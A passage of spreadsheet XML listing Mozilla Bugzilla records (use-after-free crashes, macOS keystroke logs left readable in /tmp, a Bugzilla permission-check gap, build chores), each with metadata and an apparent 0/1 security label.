          <t>chart.cgi only supports tokens for deleting charts. Should also protect against unwanted chart creation/modification.</t>
        </is>
      </c>
      <c r="X5016" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5017">
      <c r="A5017" t="n">
        <v>463277</v>
      </c>
      <c r="B5017" t="inlineStr">
        <is>
          <t>2008-11-05 13:00:22 -0800</t>
        </is>
      </c>
      <c r="C5017" t="inlineStr">
        <is>
          <t>Enable 100% sampling of Thunderbird crashes</t>
        </is>
      </c>
      <c r="D5017" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E5017" t="n">
        <v>1</v>
      </c>
      <c r="F5017" t="n">
        <v>1</v>
      </c>
      <c r="G5017" t="n">
        <v>4</v>
      </c>
      <c r="H5017" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5017" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5017" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5017" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5017" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5017" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5017" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5017" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5017" t="inlineStr"/>
      <c r="Q5017" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5017" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5017" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5017" t="n">
        <v>1</v>
      </c>
      <c r="U5017" t="n">
        <v>0</v>
      </c>
      <c r="V5017" t="n">
        <v>7</v>
      </c>
      <c r="W5017" t="inlineStr">
        <is>
          <t>At our last status meeting, it was noted that the crash-stats server should now be able to throttle crashes based on various criterias.
One of them we'd like to request for Thunderbird is to simply *not* throttle/sample Thunderbird crashes, as they most certainly represent a very small portion of submitted crashes.
Thanks.</t>
        </is>
      </c>
      <c r="X5017" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5018">
      <c r="A5018" t="n">
        <v>1837993</v>
      </c>
      <c r="B5018" t="inlineStr">
        <is>
          <t>2023-06-12 07:10:50 -0700</t>
        </is>
      </c>
      <c r="C5018" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-use-after-free [@ mozilla::dom::CanonicalBrowsingContext::NotifyOnHistoryReload] with READ of size 8</t>
        </is>
      </c>
      <c r="D5018" t="inlineStr">
        <is>
          <t>2024-05-30 11:10:55 -0700</t>
        </is>
      </c>
      <c r="E5018" t="n">
        <v>1</v>
      </c>
      <c r="F5018" t="n">
        <v>1</v>
      </c>
      <c r="G5018" t="n">
        <v>3</v>
      </c>
      <c r="H5018" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5018" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5018" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K5018" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5018" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5018" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5018" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5018" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5018" t="inlineStr">
        <is>
          <t>[adv-main115+]</t>
        </is>
      </c>
      <c r="Q5018" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5018" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5018" t="inlineStr">
        <is>
          <t>116 Branch</t>
        </is>
      </c>
      <c r="T5018" t="n">
        <v>1</v>
      </c>
      <c r="U5018" t="n">
        <v>0</v>
      </c>
      <c r="V5018" t="n">
        <v>13</v>
      </c>
      <c r="W5018" t="inlineStr">
        <is>
          <t>The attached crash information was submitted via the ASan Nightly Reporter on mozilla-central-asan-nightly revision 115.0a1-20230509215006-https://hg.mozilla.org/mozilla-central/rev/44770d5c9e91a75746e5d62aa1a933859292b77e.
For detailed crash information, see attachment.
This is an older report from mid-May that I missed earlier. Could be that we fixed this, but I'd like to double-check.</t>
        </is>
      </c>
      <c r="X5018" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5019">
      <c r="A5019" t="n">
        <v>1092855</v>
      </c>
      <c r="B5019" t="inlineStr">
        <is>
          <t>2014-11-02 14:18:16 -0800</t>
        </is>
      </c>
      <c r="C5019" t="inlineStr">
        <is>
          <t>jemalloc poisoning plus Apple uninitialized variable usage triggers keylogging in /tmp/ on OSX 10.10</t>
        </is>
      </c>
      <c r="D5019" t="inlineStr">
        <is>
          <t>2020-12-07 22:50:16 -0800</t>
        </is>
      </c>
      <c r="E5019" t="n">
        <v>1</v>
      </c>
      <c r="F5019" t="n">
        <v>1</v>
      </c>
      <c r="G5019" t="n">
        <v>3</v>
      </c>
      <c r="H5019" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5019" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5019" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5019" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5019" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5019" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5019" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5019" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5019" t="inlineStr">
        <is>
          <t>[adv-main34+][adv-esr31.3+] rdar://18946701</t>
        </is>
      </c>
      <c r="Q5019" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5019" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5019" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T5019" t="n">
        <v>1</v>
      </c>
      <c r="U5019" t="n">
        <v>0</v>
      </c>
      <c r="V5019" t="n">
        <v>201</v>
      </c>
      <c r="W5019" t="inlineStr">
        <is>
          <t>Created attachment 8515692
CGLog_Firefox_18197-sample.txt
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:33.0) Gecko/20100101 Firefox/33.0
Build ID: 20141027150301
Steps to reproduce:
I'm currently using Firefox 33.0.2 and Thunderbird 31.2.0 on MacOS 10.10 (Yosemite).
Actual results:
Both Firefox and Thunderbird are creating large log files in /tmp with the filename template of CGLog_Program_PID (ex. /tmp/CGLog_Firefox_18197 ).  Nothing special is required to cause these log files to be created, however, they do take some time to show up after starting the application; apparently the event log builds in memory first and is flushed periodically. The log file appears to contain all input events like mouse moves, clicks, and key-presses.  The mode on the file is 0644 so any process on the system could read these and thus presents a security issue especially on multi-user systems as it would contain username and password key-press data.
A small example of the log file is attached.  I didn't notice these files until after upgrading to Yosemite, but I'm not certain that was the trigger.
Expected results:
I would expect this logging would only be enabled for debug situations, and when enabled, the file mode should only allow the owning user to open it.</t>
        </is>
      </c>
      <c r="X5019" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5020">
      <c r="A5020" t="n">
        <v>766018</v>
      </c>
      <c r="B5020" t="inlineStr">
        <is>
          <t>2012-06-18 21:17:04 -0700</t>
        </is>
      </c>
      <c r="C5020" t="inlineStr">
        <is>
          <t>Use-after-free during GC on shutdown</t>
        </is>
      </c>
      <c r="D5020" t="inlineStr">
        <is>
          <t>2017-05-09 11:28:10 -0700</t>
        </is>
      </c>
      <c r="E5020" t="n">
        <v>1</v>
      </c>
      <c r="F5020" t="n">
        <v>1</v>
      </c>
      <c r="G5020" t="n">
        <v>3</v>
      </c>
      <c r="H5020" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5020" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5020" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K5020" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5020" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5020" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5020" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5020" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5020" t="inlineStr">
        <is>
          <t>[advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q5020" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5020" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5020" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T5020" t="n">
        <v>1</v>
      </c>
      <c r="U5020" t="n">
        <v>0</v>
      </c>
      <c r="V5020" t="n">
        <v>16</v>
      </c>
      <c r="W5020" t="inlineStr">
        <is>
          <t>STR
 (1) Make b2g "desktop" build: https://wiki.mozilla.org/Gaia/Hacking#Building_B2G
 (2) Start up b2g
 (3) Shut it down
I crash during shutdown 100% of the time.  valgrind tells me the problem is here
==24266== Invalid read of size 4
==24266==    at 0x94970C2: nsBaseHashtable&lt;nsDepCharHashKey, JSObject*, JSObject*&gt;::IsInitialized() const (nsBaseHashtable.h:84)
==24266==    by 0x949694B: XPCWrappedNativeScope::TraceDOMPrototypes(JSTracer*) (XPCWrappedNativeScope.cpp:777)
==24266==    by 0x9420F23: TraceXPCGlobal(JSTracer*, JSObject*) (nsXPConnect.cpp:1047)
==24266==    by 0xA7B1F7F: js::GCMarker::processMarkStackTop(js::SliceBudget&amp;) (Marking.cpp:1181)
==24266==    by 0xA7B2162: js::GCMarker::drainMarkStack(js::SliceBudget&amp;) (Marking.cpp:1225)
==24266==    by 0xA5A4F00: MarkGrayAndWeak(JSRuntime*) (jsgc.cpp:3130)
==24266==    by 0xA5A4FEC: EndMarkPhase(JSRuntime*) (jsgc.cpp:3146)
==24266==    by 0xA5A6199: NonIncrementalMark(JSRuntime*, js::JSGCInvocationKind) (jsgc.cpp:3435)
==24266==    by 0xA5A7135: GCCycle(JSRuntime*, bool, long, js::JSGCInvocationKind) (jsgc.cpp:3779)
==24266==    by 0xA5A762D: Collect(JSRuntime*, bool, long, js::JSGCInvocationKind, js::gcreason::Reason) (jsgc.cpp:3886)
==24266==    by 0xA5A7771: js::GC(JSRuntime*, js::JSGCInvocationKind, js::gcreason::Reason) (jsgc.cpp:3910)
==24266==    by 0xA566EC6: js::DestroyContext(JSContext*, js::DestroyContextMode) (jscntxt.cpp:316)
==24266==    by 0xA521A44: JS_DestroyContext (jsapi.cpp:1164)
==24266==    by 0x941E696: nsXPConnect::~nsXPConnect() (nsXPConnect.cpp:114)
==24266==    by 0x941E7AD: nsXPConnect::~nsXPConnect() (nsXPConnect.cpp:128)
==24266==    by 0x941E1BF: nsXPConnect::Release() (in /home/cjones/mozilla/gaia-dbg/toolkit/library/libxul.so)
==24266==    by 0x941EBA2: nsXPConnect::ReleaseXPConnectSingleton() (nsXPConnect.cpp:221)
==24266==    by 0x94693A7: xpcModuleDtor() (XPCModule.cpp:25)
==24266==    by 0x862735F: LayoutModuleDtor() (nsLayoutModule.cpp:1202)
==24266==    by 0x9D777BC: nsComponentManagerImpl::KnownModule::~KnownModule() (nsComponentManager.h:175)
==24266==    by 0x9D80576: nsAutoPtr&lt;nsComponentManagerImpl::KnownModule&gt;::~nsAutoPtr() (nsAutoPtr.h:71)
==24266==    by 0x9D801C8: nsTArrayElementTraits&lt;nsAutoPtr&lt;nsComponentManagerImpl::KnownModule&gt; &gt;::Destruct(nsAutoPtr&lt;nsComponentManagerImpl::KnownModule&gt;*) (nsTArray.h:348)
==24266==    by 0x9D7F888: nsTArray&lt;nsAutoPtr&lt;nsComponentManagerImpl::KnownModule&gt;, nsTArrayDefaultAllocator&gt;::DestructRange(unsigned int, unsigned int) (nsTArray.h:1211)
==24266==    by 0x9D7E89F: nsTArray&lt;nsAutoPtr&lt;nsComponentManagerImpl::KnownModule&gt;, nsTArrayDefaultAllocator&gt;::RemoveElementsAt(unsigned int, unsigned int) (nsTArray.h:931)
==24266==    by 0x9D7D670: nsTArray&lt;nsAutoPtr&lt;nsComponentManagerImpl::KnownModule&gt;, nsTArrayDefaultAllocator&gt;::Clear() (nsTArray.h:942)
==24266==    by 0x9D79CBD: nsComponentManagerImpl::Shutdown() (nsComponentManager.cpp:737)
==24266==    by 0x9D24EDF: mozilla::ShutdownXPCOM(nsIServiceManager*) (nsXPComInit.cpp:680)
==24266==    by 0x9D2490F: NS_ShutdownXPCOM_P (nsXPComInit.cpp:542)
==24266==    by 0x8331AF5: ScopedXPCOMStartup::~ScopedXPCOMStartup() (nsAppRunner.cpp:1103)
==24266==    by 0x833B394: XREMain::XRE_main(int, char**, nsXREAppData const*) (nsAppRunner.cpp:3875)
==24266==  Address 0x26c842c4 is 132 bytes inside a block of size 168 free'd
==24266==    at 0x4C2A403: free (vg_replace_malloc.c:427)
==24266==    by 0x687DFA1: moz_free (mozalloc.cpp:48)
==24266==    by 0x949588B: XPCWrappedNativeScope::~XPCWrappedNativeScope() (mozalloc.h:224)
==24266==    by 0x9496110: XPCWrappedNativeScope::KillDyingScopes() (XPCWrappedNativeScope.cpp:521)
==24266==    by 0x9496328: XPCWrappedNativeScope::SystemIsBeingShutDown() (XPCWrappedNativeScope.cpp:604)
==24266==    by 0x941E67A: nsXPConnect::~nsXPConnect() (nsXPConnect.cpp:111)
==24266==    by 0x941E7AD: nsXPConnect::~nsXPConnect() (nsXPConnect.cpp:128)
==24266==    by 0x941E1BF: nsXPConnect::Release() (in /home/cjones/mozilla/gaia-dbg/toolkit/library/libxul.so)
==24266==    by 0x941EBA2: nsXPConnect::ReleaseXPConnectSingleton() (nsXPConnect.cpp:221)
==24266==    by 0x94693A7: xpcModuleDtor() (XPCModule.cpp:25)
==24266==    by 0x862735F: LayoutModuleDtor() (nsLayoutModule.cpp:1202)
==24266==    by 0x9D777BC: nsComponentManagerImpl::KnownModule::~KnownModule() (nsComponentManager.h:175)
==24266==    by 0x9D80576: nsAutoPtr&lt;nsComponentManagerImpl::KnownModule&gt;::~nsAutoPtr() (nsAutoPtr.h:71)
==24266==    by 0x9D801C8: nsTArrayElementTraits&lt;nsAutoPtr&lt;nsComponentManagerImpl::KnownModule&gt; &gt;::Destruct(nsAutoPtr&lt;nsComponentManagerImpl::KnownModule&gt;*) (nsTArray.h:348)
==24266==    by 0x9D7F888: nsTArray&lt;nsAutoPtr&lt;nsComponentManagerImpl::KnownModule&gt;, nsTArrayDefaultAllocator&gt;::DestructRange(unsigned int, unsigned int) (nsTArray.h:1211)
==24266==    by 0x9D7E89F: nsTArray&lt;nsAutoPtr&lt;nsComponentManagerImpl::KnownModule&gt;, nsTArrayDefaultAllocator&gt;::RemoveElementsAt(unsigned int, unsigned int) (nsTArray.h:931)
==24266==    by 0x9D7D670: nsTArray&lt;nsAutoPtr&lt;nsComponentManagerImpl::KnownModule&gt;, nsTArrayDefaultAllocator&gt;::Clear() (nsTArray.h:942)
==24266==    by 0x9D79CBD: nsComponentManagerImpl::Shutdown() (nsComponentManager.cpp:737)
==24266==    by 0x9D24EDF: mozilla::ShutdownXPCOM(nsIServiceManager*) (nsXPComInit.cpp:680)
==24266==    by 0x9D2490F: NS_ShutdownXPCOM_P (nsXPComInit.cpp:542)
==24266==    by 0x8331AF5: ScopedXPCOMStartup::~ScopedXPCOMStartup() (nsAppRunner.cpp:1103)
==24266==    by 0x833B394: XREMain::XRE_main(int, char**, nsXREAppData const*) (nsAppRunner.cpp:3875)
==24266==    by 0x833B568: XRE_main (nsAppRunner.cpp:3929)
==24266==    by 0x401EDD: do_main(int, char**) (nsBrowserApp.cpp:153)
==24266==    by 0x402133: main (nsBrowserApp.cpp:236)
==24266== 
Marking ss because I have no idea what the extent of the underlying issue is here.  If I had to guess, I would be it's some XPCOM thing staying alive too long in b2g, but I dunno.</t>
        </is>
      </c>
      <c r="X5020" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5021">
      <c r="A5021" t="n">
        <v>287109</v>
      </c>
      <c r="B5021" t="inlineStr">
        <is>
          <t>2005-03-21 13:05:21 -0800</t>
        </is>
      </c>
      <c r="C5021" t="inlineStr">
        <is>
          <t>[SECURITY] Names of private products/components can be exposed on certain CGIs</t>
        </is>
      </c>
      <c r="D5021" t="inlineStr">
        <is>
          <t>2005-05-18 18:34:41 -0700</t>
        </is>
      </c>
      <c r="E5021" t="n">
        <v>1</v>
      </c>
      <c r="F5021" t="n">
        <v>1</v>
      </c>
      <c r="G5021" t="n">
        <v>4</v>
      </c>
      <c r="H5021" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5021" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5021" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K5021" t="inlineStr">
        <is>
          <t>2.16</t>
        </is>
      </c>
      <c r="L5021" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5021" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5021" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5021" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5021" t="inlineStr"/>
      <c r="Q5021" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5021" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5021" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T5021" t="n">
        <v>1</v>
      </c>
      <c r="U5021" t="n">
        <v>0</v>
      </c>
      <c r="V5021" t="n">
        <v>56</v>
      </c>
      <c r="W5021" t="inlineStr">
        <is>
          <t>*** Please do not remove the security flag till we have clearly identified if
there are "real" security holes ***
Per discussion with justdave in IRC, it appears that some validation functions
have confusing name or do incomplete validation.
Two examples:
1. In enter_bug.cgi, CanEnterProduct() is called to "check and make sure that
the user has permission to enter a bug against this product." (comment taken
from that file, line 293). Based on this statement, I removed an additional
check as part of bug 282267, because I thought CanEnterProduct() and
lsearch(\@::enterable_products, $product) == -1 were both doing the same job. It
appears that it is *not* the case!! So the validation done by CanEnterProduct()
is incomplete, as it should also check the 'disallownew' bit.
2. Independently of my "mistake" about this validation in enter_bug.cgi, it's
still possible to enter bugs in "closed" products by hacking the URL given to
post_bug.cgi as this file "only" calls CanEnterProduct()! I can reproduce this
on both 2.18 and 2.20 (I haven't tested with 2.16).
There are several functions (in globals.pl) with similar names: CanEnterProduct,
GetEnterableProducts and GetSelectableProducts for example. But they do not seem
to do what they really should do and some of them seem to be incorrectly used.
Coming back to my previous examples 1. and 2., CanEnterProduct() should consider
the 'disallownew' bit. There may be more...
Before releasing any new version, we should make sure that everything is ok...</t>
        </is>
      </c>
      <c r="X5021" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5022">
      <c r="A5022" t="n">
        <v>1134240</v>
      </c>
      <c r="B5022" t="inlineStr">
        <is>
          <t>2015-02-18 08:36:04 -0800</t>
        </is>
      </c>
      <c r="C5022" t="inlineStr">
        <is>
          <t>pasting filtered urls in irc/etc. fails due to spaces</t>
        </is>
      </c>
      <c r="D5022" t="inlineStr">
        <is>
          <t>2015-04-30 07:27:35 -0700</t>
        </is>
      </c>
      <c r="E5022" t="n">
        <v>1</v>
      </c>
      <c r="F5022" t="n">
        <v>1</v>
      </c>
      <c r="G5022" t="n">
        <v>7</v>
      </c>
      <c r="H5022" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5022" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5022" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5022" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5022" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5022" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5022" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5022" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5022" t="inlineStr"/>
      <c r="Q5022" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5022" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5022" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5022" t="n">
        <v>1</v>
      </c>
      <c r="U5022" t="n">
        <v>0</v>
      </c>
      <c r="V5022" t="n">
        <v>9</v>
      </c>
      <c r="W5022" t="inlineStr">
        <is>
          <t>while investigating talos failures, it is common to communicate in bugs, irc, email with links to treeherder to show a filtered view.  Here is an example:
https://treeherder.mozilla.org/#/jobs?repo=mozilla-inbound&amp;fromchange=2aee204e65cb&amp;tochange=23c78316747f&amp;filter-searchStr=Rev5 MacOSX Mountain Lion 10.8 mozilla-inbound talos svgr
The problem is the filter has spaces in it and the clickable url is broken which means the filter doesn't apply.</t>
        </is>
      </c>
      <c r="X5022" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5023">
      <c r="A5023" t="n">
        <v>1288482</v>
      </c>
      <c r="B5023" t="inlineStr">
        <is>
          <t>2016-07-21 10:29:29 -0700</t>
        </is>
      </c>
      <c r="C5023" t="inlineStr">
        <is>
          <t>URL parsing causes crash</t>
        </is>
      </c>
      <c r="D5023" t="inlineStr">
        <is>
          <t>2024-01-10 06:17:34 -0800</t>
        </is>
      </c>
      <c r="E5023" t="n">
        <v>1</v>
      </c>
      <c r="F5023" t="n">
        <v>1</v>
      </c>
      <c r="G5023" t="n">
        <v>3</v>
      </c>
      <c r="H5023" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5023" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5023" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5023" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L5023" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5023" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5023" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5023" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5023" t="inlineStr">
        <is>
          <t>[necko-active][post-critsmash-triage][adv-main50+]</t>
        </is>
      </c>
      <c r="Q5023" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5023" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5023" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T5023" t="n">
        <v>1</v>
      </c>
      <c r="U5023" t="n">
        <v>0</v>
      </c>
      <c r="V5023" t="n">
        <v>20</v>
      </c>
      <c r="W5023" t="inlineStr">
        <is>
          <t>Created attachment 8773364
linux_asan_log.txt
+++ This bug was initially created as a clone of Bug #1288123 +++
NOTE: This clone was created because the description of the initial bug was crashing browsers. The original was logged by db@kavod.com.
WARNING: Opening the Bug #1288123 may trigger crash.
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Steps to reproduce:
Create an html page with the following contents, access it, then "reload this page" one time.
Actual results:
It crashes for version 46+ on OS X, including FirefoxNightly 50.0a1 (2016-07-15). Older versions and other platforms work. (45 on OS X works, 47 on Linux works, etc.)
Process:               firefox [38048]
Path:                  /Applications/NightlyDebug.app/Contents/MacOS/firefox
Identifier:            org.mozilla.nightlydebug
Version:               47.0.2 (4716.7.2)
Code Type:             X86-64 (Native)
Parent Process:        ??? [1]
Responsible:           firefox [38048]
User ID:               25628395
Date/Time:             2016-07-20 08:00:17.778 -0700
OS Version:            Mac OS X 10.11.5 (15F34)
Report Version:        11
Anonymous UUID:        4F065409-6410-EED7-4352-470B9B7EA9DD
Sleep/Wake UUID:       1B10C1A4-591F-4DAC-AD77-30B47ECCF792
Time Awake Since Boot: 400000 seconds
Time Since Wake:       2900 seconds
System Integrity Protection: enabled
Crashed Thread:        0  Dispatch queue: com.apple.main-thread
Exception Type:        EXC_BAD_ACCESS (SIGSEGV)
Exception Codes:       KERN_INVALID_ADDRESS at 0x0000000213393047
Exception Note:        EXC_CORPSE_NOTIFY
VM Regions Near 0x213393047:
    mapped file            000000019de00000-000000019e082000 [ 2568K] r--/rwx SM=COW  
--&gt; 
    STACK GUARD            0000700000000000-0000700000001000 [    4K] ---/rwx SM=NUL  stack guard for thread 62
Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   libsystem_platform.dylib      	0x00007fff83382360 _platform_strncmp + 320
1   XUL                           	0x00000001052a5db7 0x105093000 + 2174391
2   XUL                           	0x00000001086e0f64 0x105093000 + 56942436
3   XUL                           	0x00000001051b695a 0x105093000 + 1194330
4   XUL                           	0x00000001051b1b9d 0x105093000 + 1174429
5   XUL                           	0x000000010866a5ae 0x105093000 + 56456622
6   XUL                           	0x000000010623009f 0x105093000 + 18469023
7   XUL                           	0x00000001062fb175 0x105093000 + 19300725
[...]
Expected results:
No crash.</t>
        </is>
      </c>
      <c r="X5023" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5024">
      <c r="A5024" t="n">
        <v>114693</v>
      </c>
      <c r="B5024" t="inlineStr">
        <is>
          <t>2001-12-11 11:34:26 -0800</t>
        </is>
      </c>
      <c r="C5024" t="inlineStr">
        <is>
          <t>Update MacOS X build version for 0.9.7</t>
        </is>
      </c>
      <c r="D5024" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E5024" t="n">
        <v>1</v>
      </c>
      <c r="F5024" t="n">
        <v>1</v>
      </c>
      <c r="G5024" t="n">
        <v>2</v>
      </c>
      <c r="H5024" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5024" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J5024" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K5024" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5024" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M5024" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5024" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5024" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5024" t="inlineStr"/>
      <c r="Q5024" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5024" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5024" t="inlineStr">
        <is>
          <t>mozilla0.9.7</t>
        </is>
      </c>
      <c r="T5024" t="n">
        <v>1</v>
      </c>
      <c r="U5024" t="n">
        <v>0</v>
      </c>
      <c r="V5024" t="n">
        <v>8</v>
      </c>
      <c r="W5024" t="inlineStr">
        <is>
          <t>Per the version update checklist, need to update the OS X mozilla.plst file for
0.9.7.  This needs to be changed on both the branch and the trunk once the 0.9.7
branch has been cut.
On the 0.9.7 branch it should be "0.9.7"
On the trunk post097 it should be "0.9.7+"
This should be two patches and both landed before the bug is closed.  I think
this is the first time we've done this, so check with jj if you have any
problems / questions.  You may need to update this on the build system as well
as check it into the tree.</t>
        </is>
      </c>
      <c r="X5024" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5025">
      <c r="A5025" t="n">
        <v>1437632</v>
      </c>
      <c r="B5025" t="inlineStr">
        <is>
          <t>2018-02-12 11:23:32 -0800</t>
        </is>
      </c>
      <c r="C5025" t="inlineStr">
        <is>
          <t>ctrl-c doesn't work with "make dockertest"</t>
        </is>
      </c>
      <c r="D5025" t="inlineStr">
        <is>
          <t>2018-02-13 06:48:18 -0800</t>
        </is>
      </c>
      <c r="E5025" t="n">
        <v>1</v>
      </c>
      <c r="F5025" t="n">
        <v>1</v>
      </c>
      <c r="G5025" t="n">
        <v>4</v>
      </c>
      <c r="H5025" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5025" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5025" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5025" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5025" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5025" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5025" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5025" t="inlineStr">
        <is>
